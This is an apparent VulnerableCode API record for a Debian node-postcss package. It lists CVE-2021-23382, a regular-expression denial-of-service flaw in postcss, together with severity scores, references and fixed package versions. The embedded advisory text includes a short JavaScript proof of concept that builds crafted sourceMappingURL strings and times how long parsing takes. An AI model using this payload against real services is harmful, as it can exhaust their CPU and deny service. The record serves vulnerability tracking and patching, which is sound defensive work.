Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-7?distro=trixie
Typedeb
Namespacedebian
Namenode-postcss
Version8.2.1+~cs5.3.23-7
Qualifiers
distro trixie
Subpath
Is_vulnerablefalse
Next_non_vulnerable_version8.2.1+~cs5.3.23-8+deb11u1
Latest_non_vulnerable_version8.5.12+~cs9.3.32-1
Affected_by_vulnerabilities
Fixing_vulnerabilities
0
url VCID-scy5-ccf9-dygp
vulnerability_id VCID-scy5-ccf9-dygp
summary 
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern 
```regex
\/\*\s* sourceMappingURL=(.*)
```

### PoC
```js
var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}
```
```js
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23382.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23382.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-23382
reference_id
reference_type
scores
0
value 0.00071
scoring_system epss
scoring_elements 0.21465
published_at 2026-04-29T12:55:00Z
1
value 0.00071
scoring_system epss
scoring_elements 0.2161
published_at 2026-04-07T12:55:00Z
2
value 0.00071
scoring_system epss
scoring_elements 0.21686
published_at 2026-04-08T12:55:00Z
3
value 0.00071
scoring_system epss
scoring_elements 0.21743
published_at 2026-04-09T12:55:00Z
4
value 0.00071
scoring_system epss
scoring_elements 0.21754
published_at 2026-04-11T12:55:00Z
5
value 0.00071
scoring_system epss
scoring_elements 0.21714
published_at 2026-04-12T12:55:00Z
6
value 0.00071
scoring_system epss
scoring_elements 0.21658
published_at 2026-04-13T12:55:00Z
7
value 0.00071
scoring_system epss
scoring_elements 0.21656
published_at 2026-04-16T12:55:00Z
8
value 0.00071
scoring_system epss
scoring_elements 0.21663
published_at 2026-04-18T12:55:00Z
9
value 0.00071
scoring_system epss
scoring_elements 0.21631
published_at 2026-04-21T12:55:00Z
10
value 0.00071
scoring_system epss
scoring_elements 0.21483
published_at 2026-04-24T12:55:00Z
11
value 0.00071
scoring_system epss
scoring_elements 0.21477
published_at 2026-04-26T12:55:00Z
12
value 0.00071
scoring_system epss
scoring_elements 0.21632
published_at 2026-04-01T12:55:00Z
13
value 0.00071
scoring_system epss
scoring_elements 0.21803
published_at 2026-04-02T12:55:00Z
14
value 0.00071
scoring_system epss
scoring_elements 0.21856
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-23382
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382
3
reference_url https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
4
reference_url https://github.com/postcss/postcss/releases/tag/7.0.36
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/releases/tag/7.0.36
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-23382
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-23382
6
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
7
reference_url https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1954150
reference_id 1954150
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1954150
9
reference_url https://github.com/advisories/GHSA-566m-qj78-rww5
reference_id GHSA-566m-qj78-rww5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-566m-qj78-rww5
10
reference_url https://access.redhat.com/errata/RHSA-2021:2438
reference_id RHSA-2021:2438
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2438
11
reference_url https://access.redhat.com/errata/RHSA-2021:3917
reference_id RHSA-2021:3917
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3917
fixed_packages
0
url pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-7?distro=trixie
purl pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-7?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.2.1%252B~cs5.3.23-7%3Fdistro=trixie
1
url pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8?distro=trixie
purl pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-mtj5-ftn7-jye6
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.2.1%252B~cs5.3.23-8%3Fdistro=trixie
2
url pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1?distro=trixie
purl pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-mtj5-ftn7-jye6
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.4.20%252B~cs8.0.23-1%252Bdeb12u1%3Fdistro=trixie
3
url pkg:deb/debian/node-postcss@8.4.49%2B~cs9.2.32-1?distro=trixie
purl pkg:deb/debian/node-postcss@8.4.49%2B~cs9.2.32-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-mtj5-ftn7-jye6
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.4.49%252B~cs9.2.32-1%3Fdistro=trixie
4
url pkg:deb/debian/node-postcss@8.5.8%2B~cs9.3.30-1?distro=trixie
purl pkg:deb/debian/node-postcss@8.5.8%2B~cs9.3.30-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.5.8%252B~cs9.3.30-1%3Fdistro=trixie
5
url pkg:deb/debian/node-postcss@8.5.9%2B~cs9.3.30-1?distro=trixie
purl pkg:deb/debian/node-postcss@8.5.9%2B~cs9.3.30-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-mtj5-ftn7-jye6
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.5.9%252B~cs9.3.30-1%3Fdistro=trixie
6
url pkg:deb/debian/node-postcss@8.5.12%2B~cs9.3.32-1?distro=trixie
purl pkg:deb/debian/node-postcss@8.5.12%2B~cs9.3.32-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.5.12%252B~cs9.3.32-1%3Fdistro=trixie
aliases CVE-2021-23382, GHSA-566m-qj78-rww5
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-scy5-ccf9-dygp
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.2.1%252B~cs5.3.23-7%3Fdistro=trixie